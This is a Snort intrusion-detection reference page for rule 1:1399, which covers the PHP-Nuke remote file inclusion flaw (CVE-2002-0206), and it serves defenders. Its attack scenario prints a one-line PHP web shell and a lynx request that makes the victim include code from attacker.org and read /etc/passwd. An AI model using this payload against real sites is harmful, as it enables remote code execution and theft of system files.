GEN:SID 1:1399
Message WEB-PHP PHP-Nuke remote file include attempt
Summary A remote machine has possibly attempted to include a remote file as part of
PHP-nuke index.php.
Impact Possible file disclosure, or command execution at the privledge level of
the user running the webserver.
Detailed Information The index.php included with PHP-nuke allows inclusion of additional files.
Normal usage might be situations where a webmaster wants to include
additional code in their index.php.  This can be done via
"index.php?file=<path_to_file>".  PHP-nuke also allows inclusion of files
from remote sources specified by either ftp or http as the transport
protocol.  This allows attackers to craft their own php file (say, foo.php)
and store it remotely (say, http://mysite.org/foo.php) and then instruct
the victim machine to include foo.php as part of it's source.  Any code in
foo.php will get executed on the victim machine.

Affected Systems  
Attack Scenarios In an attempt to gain access to a remote site that happens to use PHP-nuke,
an attacker crafts the following foo.php, and places it on a website that
he controls:
    
    <?php
    system($cmd);
    ?>

The attacker can then include foo.php as part of a remote site's index.php
that uses PHP-nuke, and execute any command:

    lynx \
    http://victim.com/index.php?file=http://attacker.org/foo.php?cmd=cat%20/etc/passwd
    
Ease of Attack Anyone with access to a web browser and a publicly available web server on
which they have the ability to make files viewable from the web.

Corrective Action If you run PHP-nuke, either upgrade to the latest revision, or edit the
source to remove support for file inclusion.  Check your web logs for
attempted file inclusion.  If found, investigate this as a possible
system-level intrusion.
Additional References  
Rule References bugtraq: 3889
cve: 2002-0206